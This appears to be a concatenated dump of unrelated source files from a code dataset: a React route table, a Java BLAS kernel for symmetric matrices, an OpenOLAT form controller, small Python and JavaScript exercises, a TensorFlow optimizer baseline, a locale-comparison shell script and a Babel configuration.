import(/* webpackChunkName: 'p__Dashboard__models__monitor.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/monitor.js').then(
m => {
return { namespace: 'monitor', ...m.default };
},
),
],
component: () =>
import(/* webpackChunkName: "p__Dashboard__Workplace" */ '../Dashboard/Workplace'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Dashboard/Workplace').default,
exact: true,
},
{
component: () =>
React.createElement(
require('/Users/mac/Desktop/WebUI/briup/day05/ej/node_modules/umi-build-dev/lib/plugins/404/NotFound.js')
.default,
{ pagesPath: 'src/pages', hasRoutesInConfig: true },
),
},
],
},
{
path: '/customer',
icon: 'user',
name: 'customer',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__Customer__Customer" */ '../Customer/Customer'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Customer/Customer').default,
exact: true,
},
{
path: '/customerDetails',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__Customer__CustomerDetails" */ '../Customer/CustomerDetails'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Customer/CustomerDetails').default,
exact: true,
},
{
path: '/category',
icon: 'ordered-list',
name: 'category',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__Category__Category" */ '../Category/Category'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Category/Category').default,
exact: true,
},
{
path: '/product',
icon: 'shopping',
name: 'product',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__Product__Product" */ '../Product/Product'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Product/Product').default,
exact: true,
},
{
path: '/order',
icon: 'snippets',
name: 'order',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__Order__Order" */ '../Order/Order'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Order/Order').default,
exact: true,
},
{
path: '/comment',
icon: 'smile',
name: 'comment',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__Comment__Comment" */ '../Comment/Comment'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Comment/Comment').default,
exact: true,
},
{
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__404" */ '../404'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../404').default,
exact: true,
},
{
component: () =>
React.createElement(
require('/Users/mac/Desktop/WebUI/briup/day05/ej/node_modules/umi-build-dev/lib/plugins/404/NotFound.js')
.default,
{ pagesPath: 'src/pages', hasRoutesInConfig: true },
),
},
],
},
{
component: () =>
React.createElement(
require('/Users/mac/Desktop/WebUI/briup/day05/ej/node_modules/umi-build-dev/lib/plugins/404/NotFound.js')
.default,
{ pagesPath: 'src/pages', hasRoutesInConfig: true },
),
},
];
// Expose the generated route table globally — presumably read by umi
// dev tooling; TODO confirm against umi runtime.
window.g_routes = routes;

const plugins = require('umi/_runtimePlugin');
// Let registered runtime plugins patch the generated routes in place.
plugins.applyForEach('patchRoutes', { initialValue: routes });

export { routes };
/**
 * Top-level router component generated by umi: renders the route table
 * through the dva-connected router and notifies runtime plugins on
 * every history change.
 */
export default class RouterWrapper extends React.Component {
  // Unsubscribe handle returned by history.listen; no-op until set.
  unListen = () => {};

  constructor(props) {
    super(props);
    // route change handler — forwards every navigation to the
    // 'onRouteChange' plugin hook together with the route table.
    function routeChangeHandler(location, action) {
      plugins.applyForEach('onRouteChange', {
        initialValue: {
          routes,
          location,
          action,
        },
      });
    }
    this.unListen = history.listen(routeChangeHandler);
    // Fire once for the initial location so plugins see the first route.
    routeChangeHandler(history.location);
  }

  componentWillUnmount() {
    // Detach the history listener to avoid leaking the subscription.
    this.unListen();
  }

  render() {
    const props = this.props || {};
    return (
      <RendererWrapper0>
        <Router history={history}>{renderRoutes(routes, props)}</Router>
      </RendererWrapper0>
    );
  }
}
|
def HOURGLASS(x, shorten_factors):
    """Successively shorten ``x`` by each applicable factor, largest first.

    Each factor is applied at most once, and only when it evenly divides
    the current value of ``x``.

    Args:
        x: integer value to shorten.
        shorten_factors: iterable of integer factors.

    Returns:
        The shortened value of ``x``.
    """
    # Iterate over a sorted *copy* (descending). The original called
    # shorten_factors.sort(), which mutated the caller's list in place.
    for factor in sorted(shorten_factors, reverse=True):
        if x % factor == 0:
            x = x // factor
    return x


if __name__ == "__main__":
    # Example usage: 24 // 3 = 8, then 8 // 2 = 4.
    x = 24
    shorten_factors = [2, 3]
    result = HOURGLASS(x, shorten_factors)
    print(result)  # Output: 4
<reponame>weltam/idylfin
/**
* Copyright (C) 2011 - present by OpenGamma Inc. and the OpenGamma group of companies
*
* Please see distribution for license.
*/
package com.opengamma.maths.lowlevelapi.linearalgebra.blas.blas2kernelimplementations;
import java.util.Arrays;
import com.opengamma.maths.lowlevelapi.datatypes.primitive.DenseSymmetricMatrix;
import com.opengamma.maths.lowlevelapi.linearalgebra.blas.BLAS1;
import com.opengamma.maths.lowlevelapi.linearalgebra.blas.blas2kernelabstractions.BLAS2DGEMVKernelAbstraction;
/**
 * Does DGEMV like operations on the {@link DenseSymmetricMatrix} type.
 * <p>
 * Because A is symmetric, every A^T variant simply delegates to the
 * corresponding A variant. The kernels walk {@code A.getData()} linearly:
 * for each row i they read the diagonal entry first, then the entries
 * j &gt; i, adding each off-diagonal value into both row i and row j —
 * i.e. the data is assumed packed upper-triangle, row by row (consistent
 * with this walk; confirm against DenseSymmetricMatrix's storage docs).
 */
public final class DGEMVForDenseSymmetricMatrix extends BLAS2DGEMVKernelAbstraction<DenseSymmetricMatrix> {
  // Stateless singleton instance.
  private static DGEMVForDenseSymmetricMatrix s_instance = new DGEMVForDenseSymmetricMatrix();

  public static DGEMVForDenseSymmetricMatrix getInstance() {
    return s_instance;
  }

  private DGEMVForDenseSymmetricMatrix() {
  }

  /** Returns A*x. */
  @Override
  public double[] dm_stateless_A_times_x(DenseSymmetricMatrix A, double[] x) { //CSIGNORE
    final int n = A.getNumberOfRows();
    double[] tmp = new double[n];
    double[] data = A.getData();
    int ptr = 0;
    for (int i = 0; i < n; i++) {
      tmp[i] += data[ptr] * x[i]; // diagonal entry
      ptr++;
      for (int j = i + 1; j < n; j++) {
        // off-diagonal entry contributes to rows i and j (symmetry)
        tmp[i] += data[ptr] * x[j];
        tmp[j] += data[ptr] * x[i];
        ptr++;
      }
    }
    return tmp;
  }

  /** A symmetric, so A^T*x == A*x. */
  @Override
  public double[] dm_stateless_AT_times_x(DenseSymmetricMatrix A, double[] x) { //CSIGNORE
    return dm_stateless_A_times_x(A, x);
  }

  /** Returns alpha*A*x. */
  @Override
  public double[] dm_stateless_alpha_times_A_times_x(double alpha, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
    return BLAS1.dscal(alpha, dm_stateless_A_times_x(A, x));
  }

  @Override
  public double[] dm_stateless_alpha_times_AT_times_x(double alpha, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
    return dm_stateless_alpha_times_A_times_x(alpha, A, x);
  }

  /** Returns A*x + y, fused into the packed-triangle walk. */
  @Override
  public double[] dm_stateless_A_times_x_plus_y(DenseSymmetricMatrix A, double[] x, double[] y) { //CSIGNORE
    final int n = A.getNumberOfRows();
    double[] tmp = new double[n];
    double[] data = A.getData();
    int ptr = 0;
    for (int i = 0; i < n; i++) {
      tmp[i] += data[ptr] * x[i];
      ptr++;
      for (int j = i + 1; j < n; j++) {
        tmp[i] += data[ptr] * x[j];
        tmp[j] += data[ptr] * x[i];
        ptr++;
      }
      // safe to add y[i] here: row i receives no further contributions
      // once the inner loop for row i has run
      tmp[i] += y[i];
    }
    return tmp;
  }

  @Override
  public double[] dm_stateless_AT_times_x_plus_y(DenseSymmetricMatrix A, double[] x, double[] y) { //CSIGNORE
    return dm_stateless_A_times_x_plus_y(A, x, y);
  }

  /** Returns alpha*A*x + y. */
  @Override
  public double[] dm_stateless_alpha_times_A_times_x_plus_y(double alpha, DenseSymmetricMatrix A, double[] x, double[] y) { //CSIGNORE
    final int rows = A.getNumberOfRows();
    double[] tmp = dm_stateless_A_times_x(A, x);
    for (int i = 0; i < rows; i++) {
      tmp[i] = alpha * tmp[i] + y[i];
    }
    return tmp;
  }

  @Override
  public double[] dm_stateless_alpha_times_AT_times_x_plus_y(double alpha, DenseSymmetricMatrix A, double[] x, double[] y) { //CSIGNORE
    return dm_stateless_alpha_times_A_times_x_plus_y(alpha, A, x, y);
  }

  /** Returns A*x + beta*y. */
  @Override
  public double[] dm_stateless_A_times_x_plus_beta_times_y(DenseSymmetricMatrix A, double[] x, double beta, double[] y) { //CSIGNORE
    final int rows = A.getNumberOfRows();
    double[] tmp = dm_stateless_A_times_x(A, x);
    for (int i = 0; i < rows; i++) {
      tmp[i] += beta * y[i];
    }
    return tmp;
  }

  @Override
  public double[] dm_stateless_AT_times_x_plus_beta_times_y(DenseSymmetricMatrix A, double[] x, double beta, double[] y) { //CSIGNORE
    return dm_stateless_A_times_x_plus_beta_times_y(A, x, beta, y);
  }

  /** Returns alpha*A*x + beta*y (full DGEMV). */
  @Override
  public double[] dm_stateless_alpha_times_A_times_x_plus_beta_times_y(double alpha, DenseSymmetricMatrix A, double[] x, double beta, double[] y) { //CSIGNORE
    final int rows = A.getNumberOfRows();
    double[] tmp = dm_stateless_A_times_x(A, x);
    for (int i = 0; i < rows; i++) {
      tmp[i] = alpha * tmp[i] + beta * y[i];
    }
    return tmp;
  }

  @Override
  public double[] dm_stateless_alpha_times_AT_times_x_plus_beta_times_y(double alpha, DenseSymmetricMatrix A, double[] x, double beta, double[] y) { //CSIGNORE
    return dm_stateless_alpha_times_A_times_x_plus_beta_times_y(alpha, A, x, beta, y);
  }

  /** y := A*x (y is overwritten, hence the initial fill with 0). */
  @Override
  public void dm_inplace_A_times_x(double[] y, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
    final int n = A.getNumberOfRows();
    double[] data = A.getData();
    int ptr = 0;
    Arrays.fill(y, 0);
    for (int i = 0; i < n; i++) {
      y[i] += data[ptr] * x[i];
      ptr++;
      for (int j = i + 1; j < n; j++) {
        y[i] += data[ptr] * x[j];
        y[j] += data[ptr] * x[i];
        ptr++;
      }
    }
  }

  @Override
  public void dm_inplace_AT_times_x(double[] y, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
    dm_inplace_A_times_x(y, A, x);
  }

  /** y := alpha*A*x. */
  @Override
  public void dm_inplace_alpha_times_A_times_x(double[] y, double alpha, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
    final int n = A.getNumberOfRows();
    double[] data = A.getData();
    int ptr = 0;
    Arrays.fill(y, 0);
    for (int i = 0; i < n; i++) {
      y[i] += data[ptr] * x[i];
      ptr++;
      for (int j = i + 1; j < n; j++) {
        y[i] += data[ptr] * x[j];
        y[j] += data[ptr] * x[i];
        ptr++;
      }
    }
    // scale the accumulated product by alpha in place
    BLAS1.dscalInplace(alpha, y);
  }

  @Override
  public void dm_inplace_alpha_times_AT_times_x(double[] y, double alpha, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
    dm_inplace_alpha_times_A_times_x(y, alpha, A, x);
  }

  /** y := A*x + y (no fill: accumulates onto the incoming y). */
  @Override
  public void dm_inplace_A_times_x_plus_y(double[] y, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
    final int n = A.getNumberOfRows();
    double[] data = A.getData();
    int ptr = 0;
    for (int i = 0; i < n; i++) {
      y[i] += data[ptr] * x[i];
      ptr++;
      for (int j = i + 1; j < n; j++) {
        y[i] += data[ptr] * x[j];
        y[j] += data[ptr] * x[i];
        ptr++;
      }
    }
  }

  @Override
  public void dm_inplace_AT_times_x_plus_y(double[] y, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
    dm_inplace_A_times_x_plus_y(y, A, x);
  }

  /** y := alpha*A*x + y. */
  @Override
  public void dm_inplace_alpha_times_A_times_x_plus_y(double[] y, double alpha, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
    double[] tmp = dm_stateless_A_times_x(A, x);
    final int n = A.getNumberOfRows();
    for (int i = 0; i < n; i++) {
      y[i] += tmp[i] * alpha;
    }
  }

  @Override
  public void dm_inplace_alpha_times_AT_times_x_plus_y(double[] y, double alpha, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
    dm_inplace_alpha_times_A_times_x_plus_y(y, alpha, A, x);
  }

  /** y := A*x + beta*y. */
  @Override
  public void dm_inplace_A_times_x_plus_beta_times_y(double[] y, DenseSymmetricMatrix A, double[] x, double beta) { //CSIGNORE
    double[] tmp = dm_stateless_A_times_x(A, x);
    final int n = A.getNumberOfRows();
    for (int i = 0; i < n; i++) {
      y[i] = y[i] * beta + tmp[i];
    }
  }

  @Override
  public void dm_inplace_AT_times_x_plus_beta_times_y(double[] y, DenseSymmetricMatrix A, double[] x, double beta) { //CSIGNORE
    dm_inplace_A_times_x_plus_beta_times_y(y, A, x, beta);
  }

  /** y := alpha*A*x + beta*y. */
  @Override
  public void dm_inplace_alpha_times_A_times_x_plus_beta_times_y(double[] y, double alpha, DenseSymmetricMatrix A, double[] x, double beta) { //CSIGNORE
    // NOTE(review): uses AT_times_x and getNumberOfColumns() where the
    // sibling methods use A_times_x and getNumberOfRows(); both are
    // equivalent here because A is symmetric (hence square), but the
    // inconsistency is worth aligning.
    double[] tmp = dm_stateless_AT_times_x(A, x);
    final int n = A.getNumberOfColumns();
    for (int i = 0; i < n; i++) {
      y[i] = beta * y[i] + alpha * tmp[i];
    }
  }

  @Override
  public void dm_inplace_alpha_times_AT_times_x_plus_beta_times_y(double[] y, double alpha, DenseSymmetricMatrix A, double[] x, double beta) { //CSIGNORE
    dm_inplace_alpha_times_A_times_x_plus_beta_times_y(y, alpha, A, x, beta);
  }
} // class end
|
/**
* <a href="http://www.openolat.org">
* OpenOLAT - Online Learning and Training</a><br>
* <p>
* Licensed under the Apache License, Version 2.0 (the "License"); <br>
* you may not use this file except in compliance with the License.<br>
* You may obtain a copy of the License at the
* <a href="http://www.apache.org/licenses/LICENSE-2.0">Apache homepage</a>
* <p>
* Unless required by applicable law or agreed to in writing,<br>
* software distributed under the License is distributed on an "AS IS" BASIS, <br>
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. <br>
* See the License for the specific language governing permissions and <br>
* limitations under the License.
* <p>
* Initial code contributed and copyrighted by<br>
* frentix GmbH, http://www.frentix.com
* <p>
*/
package org.olat.modules.qpool.ui.metadata;
import static org.olat.modules.qpool.ui.metadata.MetaUIFactory.validateElementLogic;
import org.olat.core.gui.UserRequest;
import org.olat.core.gui.components.form.flexible.FormItemContainer;
import org.olat.core.gui.components.form.flexible.elements.StaticTextElement;
import org.olat.core.gui.components.form.flexible.elements.TextElement;
import org.olat.core.gui.components.form.flexible.impl.FormBasicController;
import org.olat.core.gui.components.form.flexible.impl.FormLayoutContainer;
import org.olat.core.gui.control.Controller;
import org.olat.core.gui.control.Event;
import org.olat.core.gui.control.WindowControl;
import org.olat.core.util.Formatter;
import org.olat.core.util.StringHelper;
import org.olat.core.util.Util;
import org.olat.modules.qpool.MetadataSecurityCallback;
import org.olat.modules.qpool.QPoolService;
import org.olat.modules.qpool.QuestionItem;
import org.olat.modules.qpool.QuestionItemAuditLog.Action;
import org.olat.modules.qpool.QuestionItemAuditLogBuilder;
import org.olat.modules.qpool.model.QuestionItemImpl;
import org.olat.modules.qpool.ui.QuestionsController;
import org.olat.modules.qpool.ui.events.QItemEdited;
import org.springframework.beans.factory.annotation.Autowired;
/**
*
* Initial date: 05.03.2013<br>
* @author srosse, <EMAIL>, http://www.frentix.com
*
*/
public class TechnicalMetadataEditController extends FormBasicController {

  // Read-only display fields populated from the question item's metadata.
  private StaticTextElement editorEl;
  private StaticTextElement formatEl;
  private StaticTextElement editorVersionEl;
  private StaticTextElement lastModifiedEl;
  private StaticTextElement statusLastModifiedEl;
  // The only editable field: the item's version string.
  private TextElement versionEl;
  private FormLayoutContainer buttonsCont;

  private QuestionItem item;

  @Autowired
  private QPoolService qpoolService;

  public TechnicalMetadataEditController(UserRequest ureq, WindowControl wControl, QuestionItem item,
      MetadataSecurityCallback securityCallback, boolean wideLayout) {
    super(ureq, wControl, wideLayout ? LAYOUT_DEFAULT : LAYOUT_VERTICAL);
    setTranslator(Util.createPackageTranslator(QuestionsController.class, getLocale(), getTranslator()));
    this.item = item;
    initForm(ureq);
    // Fill the fields and apply the read-only rules for the current item.
    setItem(item, securityCallback);
  }

  @Override
  protected void initForm(FormItemContainer formLayout, Controller listener, UserRequest ureq) {
    uifactory.addStaticTextElement("general.identifier", item.getIdentifier(), formLayout);
    uifactory.addStaticTextElement("general.master.identifier", item.getMasterIdentifier(), formLayout);
    editorEl = uifactory.addStaticTextElement("technical.editor", "", formLayout);
    editorVersionEl = uifactory.addStaticTextElement("technical.editorVersion", "", formLayout);
    formatEl = uifactory.addStaticTextElement("technical.format", "", formLayout);
    Formatter formatter = Formatter.getInstance(getLocale());
    String creationDate = formatter.formatDateAndTime(item.getCreationDate());
    // The creation date row is only added when a date is available.
    if(StringHelper.containsNonWhitespace(creationDate)) {
      uifactory.addStaticTextElement("technical.creation", creationDate, formLayout);
    }
    lastModifiedEl = uifactory.addStaticTextElement("technical.lastModified", "", formLayout);
    versionEl = uifactory.addTextElement("lifecycle.version", "lifecycle.version", 50, "", formLayout);
    statusLastModifiedEl = uifactory.addStaticTextElement("technical.statusLastModified", "", formLayout);

    buttonsCont = FormLayoutContainer.createButtonLayout("buttons", getTranslator());
    buttonsCont.setRootForm(mainForm);
    formLayout.add(buttonsCont);
    uifactory.addFormCancelButton("cancel", buttonsCont, ureq, getWindowControl());
    uifactory.addFormSubmitButton("ok", "ok", buttonsCont);
  }

  // Enable/disable the editable parts according to the security callback;
  // the submit/cancel buttons are hidden entirely when nothing is editable.
  private void setReadOnly(MetadataSecurityCallback securityCallback) {
    boolean canChangeVersion = securityCallback.canChangeVersion();
    versionEl.setEnabled(canChangeVersion);
    buttonsCont.setVisible(canChangeVersion);
  }

  // Push the current item's metadata into the form elements,
  // substituting "" for missing values and hiding empty date rows.
  private void updateUI() {
    String editor = item.getEditor() == null ? "" : item.getEditor();
    editorEl.setValue(editor);
    String editorVersion = item.getEditorVersion() == null ? "" : item.getEditorVersion();
    editorVersionEl.setValue(editorVersion);
    String format = item.getFormat() == null ? "" : item.getFormat();
    formatEl.setValue(format);
    Formatter formatter = Formatter.getInstance(getLocale());
    String lastModified = formatter.formatDateAndTime(item.getLastModified());
    lastModifiedEl.setValue(lastModified);
    lastModifiedEl.setVisible(StringHelper.containsNonWhitespace(lastModified));
    versionEl.setValue(item.getItemVersion());
    String statusLastModified = formatter.formatDateAndTime(item.getQuestionStatusLastModified());
    statusLastModified = statusLastModified != null ? statusLastModified: "";
    statusLastModifiedEl.setValue(statusLastModified);
    statusLastModifiedEl.setVisible(StringHelper.containsNonWhitespace(statusLastModified));
  }

  /** Replace the displayed item and refresh the form state. */
  public void setItem(QuestionItem item, MetadataSecurityCallback securityCallback) {
    this.item = item;
    updateUI();
    if (securityCallback != null) {
      setReadOnly(securityCallback);
    }
  }

  @Override
  protected void formCancelled(UserRequest ureq) {
    fireEvent(ureq, Event.CANCELLED_EVENT);
  }

  @Override
  protected boolean validateFormLogic(UserRequest ureq) {
    boolean allOk = true;
    // Only the version field needs checking (length limit, optional value).
    allOk &= validateElementLogic(versionEl, versionEl.getMaxLength(), false, true);
    return allOk &= super.validateFormLogic(ureq);
  }

  @Override
  protected void formOK(UserRequest ureq) {
    // Persist the new version with an audit-log entry capturing the
    // item state before and after the update.
    if(item instanceof QuestionItemImpl) {
      QuestionItemImpl itemImpl = (QuestionItemImpl)item;
      QuestionItemAuditLogBuilder builder = qpoolService.createAuditLogBuilder(getIdentity(),
          Action.UPDATE_QUESTION_ITEM_METADATA);
      builder.withBefore(itemImpl);
      itemImpl.setItemVersion(versionEl.getValue());
      item = qpoolService.updateItem(item);
      builder.withAfter(itemImpl);
      qpoolService.persist(builder.create());
      fireEvent(ureq, new QItemEdited(item));
    }
  }
}
|
<reponame>Antoveravip/Software-University
/*
Info: JavaScript for JavaScript Basics Lesson 3, JavaScript Loops, Arrays, Strings, Task 2, Find Min and Max Number
Author: Removed for reasons of anonymity
Successfully checked as valid in JSLint Validator at: http://www.jslint.com/ and JSHint Validator at: http://www.jshint.com/
*/
'use strict';
// Scans a list of numeric strings once and returns [min, max];
// for an empty list it returns the message "There is no numbers!".
function findMinAndMax(inputValue) {
    var values = inputValue;
    var count = values.length;
    if (count === 0) {
        return "There is no numbers!";
    }
    // Seed both extremes with the first value (parsed base 10).
    var smallest = parseInt(values[0], 10);
    var largest = parseInt(values[0], 10);
    var idx;
    var candidate;
    for (idx = 1; idx < count; idx += 1) {
        candidate = parseInt(values[idx], 10);
        if (candidate < smallest) {
            smallest = candidate;
        }
        if (candidate > largest) {
            largest = candidate;
        }
    }
    return [smallest, largest];
}
/* For html result view */
// Browser entry point: reads the '#data' input, splits it on
// whitespace/commas/dots, runs findMinAndMax, and appends the result
// as a new <p> element under '#output'.
function findMinAndMaxByInput() {
    var output = document.getElementById("output");
    var nums = document.getElementById('data').value;
    var elementP = document.createElement("p");
    var result;
    var outRes = "";
    if (nums !== "") {
        result = findMinAndMax(nums.split(/[\s,.]+/));
        outRes = "Min -> " + result[0] + '\n' + "Max -> " + result[1];
    } else {
        outRes = "There is no numbers!";
    }
    elementP.innerHTML = outRes;
    output.appendChild(elementP);
}
/* For node.js result */
// Console demo: run findMinAndMax over several sample arrays, including
// an empty one to exercise the "no numbers" branch.
var numbersArray = [
    [1, 2, 1, 15, 20, 5, 7, 31],
    [2, 2, 2, 2, 2],
    [500, 1, -23, 0, -300, 28, 35, 12],
    []
];
var length = numbersArray.length;
var k = 0;
var res;
var outResult;
for (k = 0; k < length; k = k + 1) {
    if (numbersArray[k].length !== 0) {
        res = findMinAndMax(numbersArray[k]);
        outResult = "Min -> " + res[0] + '\n' + "Max -> " + res[1];
    } else {
        outResult = "There is no numbers!";
    }
    console.log(outResult);
}
#!/bin/bash
# Run dieharder statistical test 101 against generator 31,
# seeding with the fixed value 1571643931 (-S) so the run is repeatable.
dieharder -d 101 -g 31 -S 1571643931
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Using standard optimizer, for comparing.

Baseline that minimizes the loss from ``raw_implement`` with plain
RMSProp, to compare against that module's hand-rolled implementation.
Uses the TensorFlow 1.x graph/session API.
"""

import numpy as np
import tensorflow as tf
import time

# Project module (not in this file): provides the loss builder and the
# problem size / iteration constants shared with the raw implementation.
from raw_implement import make_loss_and_gradients, n_dims, n_iters

# TF1 graph mode: discard any previously built graph.
tf.reset_default_graph()


def main(make_loss_and_gradients=make_loss_and_gradients,
         n_dims=n_dims, n_iters=n_iters):
    """Minimize the loss with RMSProp(lr=0.01), logging to TensorBoard.

    Prints the loss each step, stops early once it drops below 1e-2,
    and reports the elapsed wall-clock time.
    """
    # Start far from the optimum so convergence time is meaningful.
    init_x = 100*np.ones([1, n_dims])
    x = tf.Variable(init_x, dtype='float32')
    # NOTE: the returned gradients are unused here — RMSProp's minimize()
    # recomputes them internally.
    loss, gradients = make_loss_and_gradients(x)
    optimizer = tf.train.RMSPropOptimizer(0.01)
    train_op = optimizer.minimize(loss)
    tf.summary.scalar('meta-loss', loss)
    summary_op = tf.summary.merge_all()
    init = tf.global_variables_initializer()
    with tf.Session() as sess:
        writer = tf.summary.FileWriter('../dat/logdir/2', sess.graph)
        sess.run(init)
        time_start = time.time()
        for step in range(n_iters):
            loss_val, summary_val, _ = sess.run([loss, summary_op, train_op])
            print(step, loss_val)
            writer.add_summary(summary_val, step)
            if loss_val < 1e-2:
                break
        elapsed_time = time.time() - time_start
        print('Elapsed time: {} sec.'.format(elapsed_time))
        # => Elapsed time: 8.54189419746399 sec.


if __name__ == '__main__':
    main()
VERSION='master' #Repository version
REPO='FriendsOfFlarum/gamification' #Repository name
LOCALE='resources/locale' #Locale folder path
YAML1='en.yml' #Original yaml file
YAML2='fof-gamification.yml' #Translated yaml file

TEMP_DIR=$(mktemp -d)
WORK_DIR=$(pwd)

GREEN='\033[0;32m'
RED='\033[0;31m'
NC='\033[0m'

if ! [ -x "$(command -v same-yaml)" ]; then
  echo 'Error: same-yaml is not installed.' >&2
  exit 1
fi

if [[ ! "$TEMP_DIR" || ! -d "$TEMP_DIR" ]]; then
  exit 1
fi

function cleanup {
  rm -rf "$TEMP_DIR"
}
# Register the cleanup trap immediately after creating the temp dir so
# it is removed on every exit path (the original registered it at the
# very end, leaking the dir on early exits).
trap cleanup EXIT

cd "$TEMP_DIR"

# Fetch the reference (English) locale file from the upstream repo.
curl -s -L "https://raw.githubusercontent.com/$REPO/$VERSION/$LOCALE/$YAML1" > "$YAML1"

RC=0
echo "Testing $YAML1 against $YAML2:"
# BUG FIX: the original compared the two file *names*
# ([ $YAML1 = $YAML2 ]), which are constants and always differ, so the
# script reported "passed" and exited 0 regardless of the comparison.
# Use same-yaml's exit status instead (assumed non-zero on mismatch —
# confirm against the same-yaml tool's documentation).
if same-yaml --ref "$YAML1" --tra "$WORK_DIR/locale/$YAML2"; then
  printf "${GREEN}✓ passed${NC}\n"
else
  RC=1
  printf "${RED}⨉ failed${NC}\n"
fi

exit $RC
|
<filename>intro/part02-20_next_leap_year/src/next_leap_year.py<gh_stars>0
# Write your solution here

def _is_leap(year):
    """Return True if ``year`` is a leap year in the Gregorian calendar."""
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)


def next_leap_year(year):
    """Return the first leap year strictly after ``year``."""
    candidate = year + 1
    while not _is_leap(candidate):
        candidate += 1
    return candidate


if __name__ == "__main__":
    # Original behavior: read a year, print the next leap year after it.
    # The original's branch logic (including the year+t+4 shortcut for
    # centuries not divisible by 400) is replaced by a single explicit
    # leap-year test, which produces identical output.
    year = int(input("YEAR: "))
    print(f"The next leap year after {year} is {next_leap_year(year)}")
|
// @noflow
// Shared Babel configuration: default build targets ES with CommonJS
// modules; the "esm" env keeps native modules for the ESM build, and
// the "test" env adds the require.context shim (used by test runs —
// presumably Storybook/Jest; confirm against the build scripts).
module.exports = {
  presets: [
    [require.resolve("@babel/preset-env"), { bugfixes: true }],
    [require.resolve("@babel/preset-react"), { runtime: "classic" }],
    require.resolve("@babel/preset-flow"),
  ],
  plugins: [
    require.resolve("babel-plugin-styled-components"),
    require.resolve("@babel/plugin-proposal-class-properties"),
    // the private methods plugin is needed for Storybook build to succeed
    // https://github.com/storybookjs/storybook/issues/12093#issuecomment-675123136
    require.resolve("@babel/plugin-proposal-private-methods"),
    require.resolve("@babel/plugin-proposal-object-rest-spread"),
    require.resolve("@babel/plugin-proposal-nullish-coalescing-operator"),
    require.resolve("@babel/plugin-transform-runtime"),
    require.resolve("@adeira/babel-preset-adeira/src/adeira-js-warning"),
    require.resolve("@adeira/babel-preset-adeira/src/adeira-js-invariant"),
  ],
  env: {
    esm: {
      // ESM build: modules:false leaves import/export for the bundler.
      presets: [[require.resolve("@babel/preset-env"), { modules: false, bugfixes: true }]],
      plugins: [
        require.resolve("babel-plugin-styled-components"),
        [require.resolve("@babel/plugin-transform-runtime"), { useESModules: true }],
      ],
    },
    test: {
      plugins: [
        require.resolve("babel-plugin-styled-components"),
        require.resolve("babel-plugin-require-context-hook"),
      ],
    },
  },
};
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.